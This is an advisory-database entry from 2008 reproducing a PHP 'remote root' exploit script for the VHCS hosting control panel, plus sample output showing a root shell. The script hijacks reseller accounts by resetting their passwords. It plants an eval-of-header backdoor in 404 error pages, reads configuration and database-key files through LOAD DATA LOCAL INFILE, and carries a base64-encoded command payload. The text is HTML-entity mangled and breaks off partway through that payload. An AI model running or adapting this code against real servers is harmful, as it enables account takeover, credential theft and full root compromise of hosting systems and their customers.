VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit

2008-03-10T00:00:00
ID SECURITYVULNS:DOC:19368
Type securityvulns
Reporter Securityvulns
Modified 2008-03-10T00:00:00

Description

!/usr/bin/php -q

<?php

This file requires the PhpSploit class.

If you want to use this class, the latest

version can be downloaded from acid-root.new.fr.

error_reporting(E_ALL ^ E_NOTICE); require('phpsploitclass.php');

darkfig@darky:/# ./vhcs_sploit.php -url http://localhost/vhcs2/

VHCS <= 2.4.7.1 (vhcs2_daemon) Remote Root Exploit

--------------------------------------------------

About:

by DarkFig < gmdarkfig (at) gmail (dot) com >

http://acid-root.new.fr/

#acidroot@irc.worldnet.net

Exploit:

+ Logged in (Administrator)

+ The administrator has 2 resellers

/ Changing dareseller's password

/ Trying to connect as dareseller:thatpwnz

+ Login successful

+ The reseller has 2 users

+ Host domaintest.fr is connected

/ Trying to write PHP code

+ PHP code successfully written

/ We'll have to bypass open_basedir cause safe_mode=On

- User doesn't have SQL rights

/ Host domaintest.fr isn't a valid user

+ Host xpliamaclient.com is connected

/ Trying to write PHP code

+ PHP code successfully written

/ We'll have to bypass open_basedir cause safe_mode=On

- User doesn't have SQL rights

/ Host xpliamaclient.com isn't a valid user

/ Changing unautresel's password

/ Trying to connect as unautresel:thatpwnz

+ Login successful

+ The reseller has 1 users

+ Host thegoodone.com is connected

/ Trying to write PHP code

+ PHP code successfully written

/ We'll have to bypass open_basedir cause safe_mode=On

/ Trying to create a database

+ Database 92xpl_db39 successfully created

+ Using database id 12

/ Trying to add SQL user

+ User 93xpl_usr2 successfully created

+ Using SQL user id 17

+ Host thegoodone.com is a valid user

+ Logged in (thegoodone.com - Client)

/ Trying to load files via local_infile

+ Ok: /etc/vhcs2/vhcs2.conf

+ Ok: /var/www/vhcs2/gui/include/vhcs2-db-keys.php

+ Now you can execute commands as root =]

+ root@thegoodone.com: id

uid=0(root) gid=0(root)

class vhcs_xpl extends phpsploit { var $sleep_time = 4;

    #  -rw-r--r-- 1 root root
    var $conf_path = &#39;/etc/vhcs2/vhcs2.conf&#39;;

    # -r-------- 1 www-data www-data
    var $keys_path = &#39;/var/www/vhcs2/gui/include/vhcs2-db-keys.php&#39;;

    var $head_arr = array&#40;
        &#39;admin/index.php&#39;       =&gt; 3,
        &#39;reseller/index.php&#39;    =&gt; 2,
        &#39;../reseller/index.php&#39; =&gt; 2,
        &#39;client/index.php&#39;      =&gt; 1,
        &#39;&#39;                      =&gt; 0&#41;;

    var $privileges = array&#40;
        3 =&gt; &#39;Administrator&#39;,
        2 =&gt; &#39;Reseller&#39;,
        1 =&gt; &#39;Client&#39;&#41;;

    var $reg_arr = array&#40;
        1 =&gt; &#39;#edit_reseller&#92;.php&#92;?edit_id=&#40;[0-9]+&#41;&quot; class=&quot;link&quot;&gt;&#40;.*&#41; &lt;/a&gt; &lt;/td&gt;#i&#39;,
        2 =&gt; &#39;#edit_user.php&#92;?edit_id=&#40;[0-9]+&#41;&quot; class=&quot;link&quot;&gt;&#40;.*&#41;&lt;/a&gt;&lt;/td&gt;#i&#39;,
        3 =&gt; &#39;#delete_sql_database&#92;.php&#92;?id=&#40;[0-9]+&#41;#i&#39;,
        4 =&gt; &#39;#delete_sql_database&#92;.php&#92;?id=&#40;[0-9]+&#41;#i&#39;,
        5 =&gt; &#39;#sql_execute_query.php&#92;?id=&#40;[0-9]+&#41;#i&#39;&#41;;

    var $flags = array&#40;
       -1 =&gt; &#39;-&#39;,
        0 =&gt; &#39;/&#39;,
        1 =&gt; &#39;+&#39;&#41;;

    function main&#40;&#41;
    {
            $this-&gt;agent&#40;&#39;Mozilla Firefox&#39;&#41;;
            $this-&gt;cookiejar&#40;1&#41;;

            $this-&gt;mhead&#40;&#41;;

            $this-&gt;uri      = $this-&gt;getparam&#40;&#39;url&#39;, TRUE&#41;;
            $this-&gt;url_arr  = parse_url&#40;$this-&gt;uri&#41;;

            $this-&gt;patch = $this-&gt;getparam&#40;&#39;patch&#39;&#41;;
            $this-&gt;proxh = $this-&gt;getparam&#40;&#39;proxhost&#39;&#41;;
            $this-&gt;proxa = $this-&gt;getparam&#40;&#39;proxauth&#39;&#41;;

            if&#40;$this-&gt;proxh&#41;
               $this-&gt;proxy&#40;$this-&gt;proxh&#41;;

            if&#40;$this-&gt;proxa&#41;
               $this-&gt;proxyauth&#40;$this-&gt;proxa&#41;;

            print &quot;&#92;nExploit:&quot;;
            $this-&gt;type = $this-&gt;login&#40;&#41;;

            if&#40;empty&#40;$this-&gt;type&#41;&#41;
            {
                    if&#40;!$this-&gt;patch&#41;
                    {
                            $this-&gt;msg&#40;&#39;A patch has been applied to this website&#39;, -1&#41;;
                            $this-&gt;msg&#40;&quot;See RoMaNSoFt&#39;s advisory for more details&quot;, -1&#41;;
                            $this-&gt;msg&#40;&#39;Try with the -patch option&#39;, -1, 1&#41;;
                    }
                    else
                       $this-&gt;msg&#40;&#39;Bad username/password&#39;, -1, 1&#41;;
            }

            $this-&gt;msg&#40;&quot;Logged in &#40;&quot;.$this-&gt;usr.&#39; - &#39;.$this-&gt;privileges[$this-&gt;type].&#39;&#41;&#39;, 1&#41;;

            $this-&gt;allowredirection&#40;1&#41;;

            $this-&gt;get_vhcs_conf&#40;&#41;;

            $this-&gt;exec_cmd&#40;&#41;;

            return;
    }


    function getparam&#40;$param, $nec=FALSE&#41;
    {
            global $argv;

            foreach&#40;$argv as $value =&gt; $key&#41;
            {
                    if&#40;$key === &#39;-&#39;.$param&#41;
                       return $argv[$value+1];
            }

            if&#40;$nec&#41;
               $this-&gt;usage&#40;&#41;;

            return FALSE;
    }

    function mhead&#40;&#41;
    {
            print &quot;&#92;n VHCS &lt;= 2.4.7.1 &#40;vhcs2_daemon&#41; Remote Root Exploit&quot;;
            print &quot;&#92;n --------------------------------------------------&#92;n&quot;;
            print &quot;&#92;nAbout:&quot;;
            print &quot;&#92;n by DarkFig &lt; gmdarkfig &#40;at&#41; gmail &#40;dot&#41; com &gt;&quot;;
            print &quot;&#92;n http://acid-root.new.fr/&quot;;
            print &quot;&#92;n #acidroot@irc.worldnet.net&quot;;
            print &quot;&#92;n&quot;;

            return;
    }

    function usage&#40;&#41;
    {
            print &quot;&#92;nUsage:&quot;;
            print &quot;&#92;n vhcsxpl.php -url &lt;url&gt; [options...]&#92;n&quot;;
            print &quot;&#92;nOptions:&quot;;
            print &quot;&#92;n -patch &lt;user:pwd&gt;     Unofficial patch applied&quot;;
            print &quot;&#92;n -proxhost &lt;ip&gt;        If you wanna use a proxy&quot;;
            print &quot;&#92;n -proxauth &lt;usr:pwd&gt;   Proxy with authentication&#92;n&quot;;
            print &quot;&#92;n&quot;;

            exit&#40;1&#41;;
    }

    function log_as&#40;&#41;
    {
            $this-&gt;msg&#40;&quot;Trying to connect as &quot;.$this-&gt;usr.&#39;:&#39;.$this-&gt;pwd, 0&#41;;
            $this-&gt;allowredirection&#40;1&#41;;

            $this-&gt;post&#40;$this-&gt;uri.&#39;chk_login.php&#39;,
            &#39;uname=&#39;.$this-&gt;usr.&#39;&amp;upass=&#39;.$this-&gt;pwd.&#39;&amp;Submit=+++Login+++&#39;&#41;;

            $this-&gt;redir_type = $this-&gt;get_type_by_redir&#40;&#41;;

            if&#40;$this-&gt;redir_type == 0&#41;
               $this-&gt;msg&#40;&#39;Login attempt failed&#39;, -1&#41;;

            else
               $this-&gt;msg&#40;&#39;Login successful&#39;, 1&#41;;

            return $this-&gt;redir_type;
    }

    function get_type_by_redir&#40;&#41;
    {
            $this-&gt;redir_arr = parse_url&#40;$this-&gt;last_redirection&#41;;

            $this-&gt;allowredirection&#40;0&#41;;

            return $this-&gt;head_arr[$this-&gt;redir_arr[&#39;path&#39;]];
    }

    function login&#40;&#41;
    {
            if&#40;$this-&gt;patch&#41;
            {
                    $this-&gt;idents = explode&#40;&#39;:&#39;, $this-&gt;patch&#41;;
                    list&#40;$this-&gt;usr, $this-&gt;pwd&#41; =  $this-&gt;idents;

                    $this-&gt;type = $this-&gt;log_as&#40;&#41;;

                    return $this-&gt;log_as_user&#40;&#41;;
            }
            else
            {
                    $this-&gt;get&#40;$this-&gt;uri.&#39;admin/manage_users.php&#39;&#41;;

                    $this-&gt;type = 3;

                    if&#40;ereg&#40;&#39;add_user&#92;.php&#39;, $this-&gt;getcontent&#40;&#41;&#41;&#41;
                       return $this-&gt;log_as_user&#40;&#41;;

                    else
                       return 0;
            }
    }

    function log_as_user&#40;&#41;
    {
            if&#40;$this-&gt;type == 3&#41;
               $this-&gt;logged_as_admin&#40;&#41;;

            if&#40;$this-&gt;type == 2&#41;
               $this-&gt;logged_as_reseller&#40;&#41;;

            if&#40;$this-&gt;type == 1&#41;
            {
                    if&#40;!$this-&gt;patch&#41;
                       return 1;

                    else
                       return $this-&gt;valid_user&#40;&#41;;
            }

            else
               return 0;
    }

    function valid_user&#40;&#41;
    {
            if&#40;$this-&gt;write_code&#40;&#41;&#41;
            {
                    # open_basedir + safe_mode
                    if&#40;$this-&gt;is_safe&#40;&#41;&#41;
                    {
                            if&#40;$this-&gt;bypass_with_db&#40;&#41;&#41;
                               return 1;

                            else
                               return 0;
                    }
                    else
                       return 1;
            }
            return 0;               
    }

    function logged_as_admin&#40;&#41;
    {
            $this-&gt;msg&#40;&#39;Logged in &#40;&#39;.$this-&gt;privileges[3].&#39;&#41;&#39;, 1&#41;;

            $this-&gt;get&#40;$this-&gt;uri.&#39;admin/manage_users.php&#39;&#41;;

            preg_match_all&#40;$this-&gt;reg_arr[1], $this-&gt;getcontent&#40;&#41;, $resellers&#41;;

            $this-&gt;reseller_count = count&#40;$resellers[1]&#41;;

            $this-&gt;msg&#40;&#39;The administrator has &#39;.$this-&gt;reseller_count.&#39; resellers&#39;, 1&#41;;

            for&#40;$i=0; $i&lt;$this-&gt;reseller_count; $i++&#41;
            {       
                    $this-&gt;usr = $resellers[2][$i];
                    $this-&gt;pwd = &#39;thatpwnz&#39;;

                    if&#40;!$this-&gt;patch&#41;
                    {
                            $this-&gt;msg&#40;&#39;Changing &#39;.$resellers[2][$i].&quot;&#39;s password&quot;, 0&#41;;

                            $this-&gt;reseller_dat = &#39;&#39;;

                            $this-&gt;get&#40;$this-&gt;uri.&#39;admin/edit_reseller.php?edit_id=&#39;.$resellers[1][$i]&#41;;

                            # only checked ip
                            preg_match_all&#40;&#39;#name=&quot;ip_&#40;[0-9]+&#41;&quot; value=&quot;asgned&quot; checked#i&#39;,
                            $this-&gt;getcontent&#40;&#41;, $reseller_ips&#41;;

                            $this-&gt;ip_count = count&#40;$reseller_ips[1]&#41;;
                            $this-&gt;ip_dat = &#39;&#39;;

                            for&#40;$j=0; $j&lt;$this-&gt;ip_count; $j++&#41;
                            {
                                    $this-&gt;ip_dat .= &#39;ip_&#39;.$reseller_ips[1][$j].&#39;=asgned&#39;;

                                    if&#40;$j != $this-&gt;ip_count-1&#41;
                                       $this-&gt;ip_dat .= &#39;&amp;&#39;;
                            }

                            # Change reseller&#39;s password/mail
                            # This is needed if it was run without -path
                            # Because we can&#39;t click on the &#39;Change&#39; button.
                            #
                            # pwd: thatpwnz
                            # mail: &lt;reseller_name&gt;@ohyeah.com
                            #
                            $this-&gt;post&#40;$this-&gt;uri.&#39;admin/edit_reseller.php&#39;,
                            &#39;username=&#39;.$resellers[2][$i].&#39;&amp;pass=thatpwnz&amp;&#39;.
                            &#39;pass_rep=thatpwnz&amp;email=&#39;.$resellers[2][$i].&#39;&#39;.
                            &#39;&#37;40ohyeah.com&amp;nreseller_max_domain_cnt=0&amp;nres&#39;.
                            &#39;eller_max_subdomain_cnt=0&amp;nreseller_max_alias&#39;.
                            &#39;_cnt=0&amp;nreseller_max_mail_cnt=0&amp;nreseller_max&#39;.
                            &#39;_ftp_cnt=0&amp;nreseller_max_sql_db_cnt=0&amp;nresell&#39;.
                            &#39;er_max_sql_user_cnt=0&amp;nreseller_max_traffic=0&#39;.
                            &#39;&amp;nreseller_max_disk=0&amp;&#39;.$this-&gt;ip_dat.&#39;&amp;custo&#39;.
                            &#39;mer_id=&amp;fname=&amp;lname=&amp;firm=&amp;zip=&amp;city=&amp;countr&#39;.
                            &#39;y=&amp;street1=&amp;street2=&amp;phone=&amp;fax=&amp;Submit=++Upd&#39;.
                            &#39;ate++&amp;uaction=update_reseller&amp;edit_id=&#39;.
                            $resellers[1][$i].&#39;&amp;edit_username=&#39;.
                            $resellers[2][$i]&#41;;

                            if&#40;$this-&gt;log_as&#40;&#41; != 2&#41;
                               return 0;
                    }
                    else
                    {
                            $this-&gt;allowredirection&#40;1&#41;;

                            $this-&gt;get&#40;$this-&gt;uri.&#39;admin/change_user_interface.php?to_id=&#39;.$resellers[1][$i]&#41;;

                            if&#40;$this-&gt;get_type_by_redir&#40;&#41; != 2&#41;
                               return 0;
                    }

                    if&#40;$this-&gt;logged_as_reseller&#40;&#41;&#41;
                       return 1;

                    $this-&gt;reset&#40;&#39;cookie&#39;&#41;;
                    $this-&gt;get&#40;$this-&gt;uri.&#39;reseller/change_user_interface.php?action=go_back&#39;&#41;;
            }

            return 0;
    }

    function logged_as_reseller&#40;&#41;
    {
            $this-&gt;get&#40;$this-&gt;uri.&#39;reseller/users.php&#39;&#41;;

            preg_match_all&#40;$this-&gt;reg_arr[2], $this-&gt;getcontent&#40;&#41;, $users&#41;;

            array_walk&#40;$users[2], &#39;trim&#39;&#41;;

            $this-&gt;user_count = count&#40;$users[1]&#41;;

            $this-&gt;msg&#40;&#39;The reseller has &#39;.$this-&gt;user_count. &#39; users&#39;, 1&#41;;

            $this-&gt;patch = FALSE;

            for&#40;$i=0; $i&lt;$this-&gt;user_count; $i++&#41;
            {
                    if&#40;$this-&gt;is_alive&#40;$users[2][$i]&#41;&#41;
                    {
                            $this-&gt;usr = $users[2][$i];

                            $this-&gt;type = 1;

                            $this-&gt;msg&#40;&#39;Host &#39;.$this-&gt;usr.&#39; is connected&#39;, 1&#41;;

                            $this-&gt;get&#40;$this-&gt;uri.&#39;reseller/change_user_interface.php?to_id=&#39;.$users[1][$i]&#41;;

                            if&#40;$this-&gt;valid_user&#40;&#41;&#41;
                            {
                                    $this-&gt;msg&#40;&#39;Host &#39;.$this-&gt;usr.&#39; is a valid user&#39;, 1&#41;;
                                    return TRUE;
                            }
                            else
                               $this-&gt;msg&#40;&quot;Host &quot;.$this-&gt;usr.&quot; isn&#39;t a valid user&quot;, 0&#41;;
                    }
                    else
                       $this-&gt;msg&#40;&#39;Host &#39;.$users[2][$i].&#39; seems down&#39;, -1&#41;;

                    $this-&gt;get&#40;$this-&gt;uri.&#39;client/change_user_interface.php?action=go_back&#39;&#41;;
            }

            return FALSE;
    }

    function bypass_with_db&#40;&#41;
    {
            $this-&gt;get&#40;$this-&gt;dmn_vhcs_url.&#39;client/index.php&#39;&#41;;

            if&#40;!ereg&#40;&#39;manage_sql.php&#39;, $this-&gt;getcontent&#40;&#41;&#41; and !$edit&#41;
            {
                    $this-&gt;msg&#40;&quot;User &quot;.$this-&gt;ur.&quot; doesn&#39;t have SQL rights&quot;, -1&#41;;

                    return FALSE;
            }

            # No database
            if&#40;!$this-&gt;got_db&#40;&#41;&#41;
            {
                    $this-&gt;msg&#40;&#39;Trying to create a database&#39;, 0&#41;;

                    $this-&gt;tmp_db_name = rand&#40;0,100&#41;.&#39;xpl_db&#39;.rand&#40;0,100&#41;;

                    # Database: ..xpl_db..
                    $this-&gt;post&#40;$this-&gt;dmn_vhcs_url.&#39;client/add_sql_database.php&#39;,
                    &#39;db_name=&#39;.$this-&gt;tmp_db_name.&#39;&amp;id_pos=start&amp;Submit=++Add++&amp;&#39;.
                    &#39;uaction=add_db&#39;&#41;;

                    if&#40;$this-&gt;got_db&#40;&#41;&#41;
                       $this-&gt;msg&#40;&#39;Database &#39;.$this-&gt;tmp_db_name.&#39; successfully created&#39;, 1&#41;;

                    else
                    {
                            $this-&gt;msg&#40;&quot;Can&#39;t create the database &quot;.$this-&gt;tmp_db_name, 0&#41;;

                            return FALSE;
                    }
            }

            # First database
            $this-&gt;db_id = $this-&gt;sql_db_ids[1];

            $this-&gt;msg&#40;&#39;Using database id &#39;.$this-&gt;db_id, 1&#41;;

            if&#40;!$this-&gt;got_db_user&#40;&#41;&#41;
            {
                    $this-&gt;msg&#40;&#39;Trying to add SQL user&#39;, 0&#41;;

                    $this-&gt;tmp_db_user = rand&#40;0,100&#41;.&#39;xpl_usr&#39;.rand&#40;0,100&#41;;

                    # SQL user: ..xpl_usr..:xpl_pwd
                    $this-&gt;post&#40;$this-&gt;dmn_vhcs_url.&#39;client/sql_add_user.php&#39;,
                    &#39;user_name=&#39;.$this-&gt;tmp_db_user.&#39;&amp;id_pos=end&amp;pass=xpl_pw&#39;.
                    &#39;d&amp;pass_rep=xpl_pwd&amp;Add_New=++Add++&amp;uaction=add_user&amp;id=&#39;.
                    $this-&gt;db_id&#41;;

                    if&#40;$this-&gt;got_db_user&#40;&#41;&#41;
                       $this-&gt;msg&#40;&#39;User &#39;.$this-&gt;tmp_db_user.&#39; successfully created&#39;, 1&#41;;

                    else
                    {
                            $this-&gt;msg&#40;&quot;Can&#39;t create the SQL user &quot;.$this-&gt;tmp_db_user, 0&#41;;

                            return FALSE;
                    }
            }

            # First SQL user id associed with the database
            $this-&gt;db_user_id = $this-&gt;sql_usrs[1];

            $this-&gt;msg&#40;&#39;Using SQL user id &#39;.$this-&gt;db_user_id, 1&#41;;

            return TRUE;
    }

    function got_db_user&#40;&#41;
    {               
            $this-&gt;get&#40;$this-&gt;dmn_vhcs_url.&#39;client/manage_sql.php&#39;&#41;;

            $this-&gt;content_arr = explode&#40;&quot;&#92;n&quot;, $this-&gt;getcontent&#40;&#41;&#41;;

            $this-&gt;is_sql_db_usr = FALSE;

            for&#40;$i=0; $i&lt;count&#40;$this-&gt;content_arr&#41;; $i++&#41;
            {
                    if&#40;preg_match&#40;$this-&gt;reg_arr[4],
                    $this-&gt;content_arr[$i], $this-&gt;sql_db_id&#41;&#41;
                    {
                            if&#40;$this-&gt;sql_db_id[1] == $this-&gt;db_id&#41;
                               $this-&gt;is_sql_db_usr = TRUE;

                            else
                               $this-&gt;is_sql_db_usr = FALSE;
                    }

                    if&#40;preg_match&#40;$this-&gt;reg_arr[5],
                    $this-&gt;content_arr[$i], $this-&gt;sql_usrs&#41;&#41;
                    {
                            if&#40;$this-&gt;is_sql_db_usr&#41;
                               return TRUE;
                    }
            }
            return FALSE;
    }

    function got_db&#40;&#41;
    {       
            $this-&gt;get&#40;$this-&gt;dmn_vhcs_url.&#39;client/manage_sql.php&#39;&#41;;

            preg_match&#40;$this-&gt;reg_arr[3],
            $this-&gt;getcontent&#40;&#41;, $this-&gt;sql_db_ids&#41;;

            if&#40;empty&#40;$this-&gt;sql_db_ids&#41;&#41;
               return FALSE;

            else
               return TRUE;
    }

    function is_alive&#40;$domain_name&#41;
    {
            if&#40;gethostbyname&#40;$domain_name&#41; != $domain_name&#41;
               return TRUE;

            else
               return FALSE;
    }

    function write_code&#40;&#41;
    {
            $this-&gt;msg&#40;&#39;Trying to write PHP code&#39;, 0&#41;;

            $this-&gt;dmn_url      = &#39;http://&#39;.$this-&gt;usr;
            $this-&gt;dmn_vhcs_url = $this-&gt;dmn_url.$this-&gt;url_arr[&#39;path&#39;];

            $this-&gt;get&#40;$this-&gt;dmn_url.&#39;/errors/404/index.php&#39;&#41;;
            $this-&gt;old_404 = $this-&gt;getcontent&#40;&#41;;

            $this-&gt;phpc =
             &#39;&lt;?php &#39;
            .&#39;error_reporting&#40;0&#41;; &#39;
            .&#39;if&#40;isset&#40;$_SERVER[&#92;&#39;HTTP_SHELL&#92;&#39;]&#41;&#41; &#39;
            .&#39;{ eval&#40;base64_decode&#40;$_SERVER[&#92;&#39;HTTP_SHELL&#92;&#39;]&#41;&#41;; exit&#40;0&#41;; } &#39;
            .&#39;?&gt;&#39;;

            $this-&gt;new_404 = $this-&gt;phpc.$this-&gt;old_404;

            $this-&gt;post&#40;$this-&gt;dmn_vhcs_url.&#39;client/error_pages.php&#39;,
            &#39;error=&#39;.urlencode&#40;$this-&gt;new_404&#41;.&#39;&amp;uaction=updt_error&amp;eid=404&amp;Submit=+Save+&#39;&#41;;

            $this-&gt;exec_php&#40;&#39;print &quot;itworkz&quot;;&#39;&#41;;

            if&#40;ereg&#40;&#39;itworkz&#39;, $this-&gt;getcontent&#40;&#41;&#41;&#41;
            {
                    $this-&gt;msg&#40;&#39;PHP code successfully written&#39;, 1&#41;;

                    return TRUE;
            }
            else
            {
                    $this-&gt;msg&#40;&quot;Can&#39;t write PHP code&quot;, -1&#41;;

                    return FALSE;
            }
    }

    function get_vhcs_conf&#40;&#41;
    {
            if&#40;$this-&gt;safe_mode&#41;
               $this-&gt;msg&#40;&#39;Trying to load files via local_infile&#39;, 0&#41;;

            else
               $this-&gt;msg&#40;&#39;Trying to load files via shell_exec&#39;, 0&#41;;

            $this-&gt;lf_conf   = $this-&gt;path_content&#40;$this-&gt;conf_path&#41;;
            $this-&gt;lf_conf   = trim&#40;$this-&gt;lf_conf, &quot;&#92;r&quot;&#41;;

            $this-&gt;vhcs_conf = explode&#40;&quot;&#92;n&quot;, $this-&gt;lf_conf&#41;;

            $this-&gt;conf = array&#40;&#41;;

            foreach&#40;$this-&gt;vhcs_conf as $this-&gt;conf_line&#41;
            {
                    # comment
                    if&#40;!ereg&#40;&#39;^&#40;&#92;s*&#41;#&#39;, $this-&gt;conf_line&#41;&#41;
                    {
                            $this-&gt;pos   = strpos&#40;$this-&gt;conf_line, &#39;=&#39;&#41;;
                            $this-&gt;name  = strtoupper&#40;trim&#40;substr&#40;$this-&gt;conf_line, 0, $this-&gt;pos&#41;&#41;&#41;;
                            $this-&gt;value = trim&#40;substr&#40;$this-&gt;conf_line, $this-&gt;pos+1&#41;&#41;;

                            $this-&gt;conf[$this-&gt;name] = $this-&gt;value;
                    }
            }

            $this-&gt;php_keys_code = $this-&gt;path_content&#40;$this-&gt;keys_path&#41;;

            return;
    }

    function path_content&#40;$path&#41;
    {
            # open_basedir On/off
            # safe_mode = Off
            if&#40;!$this-&gt;safe_mode&#41;
            {
                    $this-&gt;phpc = &#39;print shell_exec&#40;&quot;cat &#39;.$path.&#39;&quot;&#41;;&#39;;

                    $this-&gt;exec_php&#40;$this-&gt;phpc&#41;;

                    $this-&gt;file_content = $this-&gt;getcontent&#40;&#41;;

            }

            # open_basedir On/Off
            # safe_mode = On
            else
            {
                    $this-&gt;rand_table = rand&#40;&#41;.&#39;tmp_hax&#39;.rand&#40;&#41;;

                    $this-&gt;sql_query =
                    &quot;CREATE TABLE &quot;.$this-&gt;rand_table.&quot; &#40;content text not null&#41;; &quot;.
                    &quot;LOAD DATA LOCAL INFILE &#39;$path&#39; INTO TABLE &quot;.$this-&gt;rand_table.
                    &quot; FIELDS TERMINATED BY &#39;__EOF__&#39; ESCAPED BY &#39;&#39; LINES TERMINAT&quot;.
                    &quot;ED BY &#39;__EOF__&#39;; SELECT CONCAT&#40;CHAR&#40;80,87,78,69,68,67,79,78,&quot;.
                    &quot;84,69,78,84&#41;,HEX&#40;content&#41;,CHAR&#40;80,87,78,69,68,67,79,78,84,69&quot;.
                    &quot;,78,84&#41;&#41; FROM &quot;.$this-&gt;rand_table.&quot;; DROP TABLE &quot;.
                    $this-&gt;rand_table;

                    $this-&gt;sql_arr = explode&#40;&#39;;&#39;, $this-&gt;sql_query&#41;;
                    $this-&gt;sql_cnt = count&#40;$this-&gt;sql_arr&#41;;

                    for&#40;$i=0; $i&lt;$this-&gt;sql_cnt; $i++&#41;
                    {
                            $this-&gt;sql_res = $this-&gt;exec_sql&#40;$this-&gt;sql_arr[$i]&#41;;

                            if&#40;$i == $this-&gt;sql_cnt-2&#41;
                               $this-&gt;file_content = $this-&gt;sql_res;
                    }

            }

            if&#40;!$this-&gt;file_content&#41;
            {
                    $this-&gt;msg&#40;&quot;A problem occurred while trying to read the file $path&quot;, -1&#41;;

                    if&#40;$this-&gt;safe_mode&#41;
                       $this-&gt;msg&#40;&quot;local_infile=Off or we don&#39;t have sufficient access rights to the file&quot;, -1, 2&#41;;

                    else
                       $this-&gt;msg&#40;&quot;We don&#39;t have sufficient access rights to the file&quot;, -1, -2&#41;;
            }
            else
               $this-&gt;msg&#40;&quot;Ok: $path&quot;, 1&#41;;

            return $this-&gt;file_content;
    }

    function exec_sql&#40;$query&#41;
    {
            $this-&gt;post&#40;$this-&gt;dmn_vhcs_url.&#39;client/sql_execute_query.php&#39;,
            &#39;user_name=&amp;sql_query=&#39;.$query.&#39;&amp;Submit=+Execute+&amp;uaction=exe&#39;.
            &#39;cute_query&amp;id=&#39;.$this-&gt;db_user_id&#41;;

            $this-&gt;sql_result = &#39;&#39;;

            if&#40;ereg&#40;&#39;PWNEDCONTENT&#39;, $this-&gt;getcontent&#40;&#41;&#41;&#41;
            {
                    $this-&gt;sql_res_arr = explode&#40;&#39;PWNEDCONTENT&#39;, $this-&gt;getcontent&#40;&#41;&#41;;

                    $this-&gt;sql_result  = pack&#40;&#39;H*&#39;, $this-&gt;sql_res_arr[1]&#41;;
            }

            return $this-&gt;sql_result;
    }

    function is_safe&#40;&#41;
    {
            $this-&gt;phpc =
            &#39;if&#40;in_array&#40;strtoupper&#40;ini_get&#40;&quot;safe_mode&quot;&#41;&#41;,array&#40;&quot;ON&quot;,&quot;1&quot;&#41;&#41; &#39;
           .&#39;or !function_exists&#40;&quot;shell_exec&quot;&#41;&#41; &#39;
           .&#39;{ print &quot;safe_mode=on&quot;; }&#39;;

            $this-&gt;exec_php&#40;$this-&gt;phpc&#41;;

            # open_basedir always set
            if&#40;ereg&#40;&#39;safe_mode=on&#39;, $this-&gt;getcontent&#40;&#41;&#41;&#41;
            {
                    $this-&gt;msg&#40;&quot;We&#39;ll have to bypass open_basedir cause safe_mode=On&quot;, 0&#41;;

                    $this-&gt;safe_mode = TRUE;
            }
            else
            {
                    $this-&gt;msg&#40;&#39;PHP configured with default safe_mode value &#40;Off&#41;&#39;, 0&#41;;

                    $this-&gt;safe_mode = FALSE;
            }

            return $this-&gt;safe_mode;
    }

    function exec_cmd&#40;&#41;
    {
            $this-&gt;msg&#40;&quot;Now you can execute commands as root =]&quot;, 1&#41;;

            $this-&gt;woot_code =
             &#39;PD9waHAKCi8qCm1haWwoJ2xlZXRAcHduZWQuY29tJywgJ3Z1bG&#39;
            .&#39;5lcmFibGUgdmhjcyBob3N0ICEnLCAndGh4IHRvIHRoZSBzayAh&#39;
            .&#39;IHZoY3MgdnVsbiBob3N0OiAnLiRfU0VSVkVSWydSRU1PVEVfQU&#39;
            .&#39;REUiddKTsKdGhpcyBpcyBhIGpva2UgPVAgd2hlbiB5b3UgdXNl&#39;
            .&#39;IGVuY29kZWQgcGhwIGNvZGUsIHNlZSB3aGF0IGlzIGl0IGJlZm&#39;
            .&#39;9yZSB1c2luZyBpdCA9KQoqLwokdmFsaWRfdiA9ICdIVFRQX1NQ&#39;
            .&#39;TE9JVF8nOwoKZm9yZWFjaCgkX1NFUlZFUiBhcyAkaGVhZGVyID&#39;
            .&#39;0+ICR2YWx1ZSkKewoJaWYoIWlzX2FycmF5KCR2YWx1ZSkpCgl7&#39;
            .&#39;CgkJJHZhbHVlID0gYmFzZTY0X2RlY29kZSgkdmFsdWUpOwoKCQ&#39;
            .&#39;lpZihlcmVnKCR2YWxpZF92LCRoZWFkZXIpKQoJCXsKCQkJaWYo&#39;
            .&#39;ZXJlZygnUEhQX0tFWVMnLCAkaGVhZGVyKSkKCQkJICAgZXZhbC&#39;
            .&#39;gkdmFsdWUpOwoKCQkJZWxzZQoJCQl7CgkJCQkkdmFyX24gID0g&#39;
            .&#39;c3RydG9sb3dlcihzdHJfcmVwbGFjZSgkdmFsaWRfdiwnJywgJG&#39;
            .&#39;hlYWRlcikpOwoJCQkJJCR2YXJfbiA9ICR2YWx1ZTsKCQkJfQoJ&#39;
            .&#39;CX0KCX0KfQoKbXlzcWxfY29ubmVjdCgkZGJfaG9zdCwkZGJfdX&#39;
            .&#39;NlcixkZWNyeXB0X2RiX3Bhc3N3b3JkKCRkYl9wYXNzKSk7Cm15&#39;
            .&#39;c3FsX3NlbGVjdF9kYigkZGJfbmFtZSk7CgokZmlsZSA9IGFkZH&#39;
            .&#39;NsYXNoZXMoJGZpbGUpOwokY21kICA9IGFkZHNsYXNoZXMoJGNt&#39;
            .&#39;ZCk7CiRWZXJzaW9uID0gJHZlcnNpb247CgokYWRkID0gYXJyYX&#39;
            .&#39;koKTsKJGFkZFtdID0gCiJJTlNFUlQgSU5UTyBkb21haW4gKGBk&#39;
            .&#39;b21haW5fbmFtZWAsYGRvbWFpbiIuCiJfZ2lkYCxgZG9tYWluX3&#39;
            .&#39;VpZGAsYGRvbWFpbl9hZG1pbl9pZGAsYGRvbSIuCiJhaW5fY3Jl&#39;
            .&#39;YXRlZF9pZGAsYGRvbWFpbl9jcmVhdGVkYCxgZG9tYWluXyIuCi&#39;
            .&#39;JsYXN0X21vZGlmaWVkYCxgZG9tYWluX21haWxhY2NfbGltaXRg&#39;
            .&#39;LGBkbyIuCiJtYWluX2Z0cGFjY19saW1pdGAsYGRvbWFpbl90cm&#39;
            .&#39;FmZmljX2xpbWl0YCIuCiIsYGRvbWFpbl9zcWxkX2xpbWl0YCxg&#39;
            .&#39;ZG9tYWluX3NxbHVfbGltaXRgLCIuCiJgZG9tYWluX3N0YXR1c2&#39;
            .&#39;AsYGRvbWFpbl9hbGlhc19saW1pdGAsYGRvbSIuCiJhaW5fc3Vi&#39;
            .&#39;ZF9saW1pdGAsYGRvbWFpbl9pcF9pZGAsYGRvbWFpbl9kaSIuCi&#39;
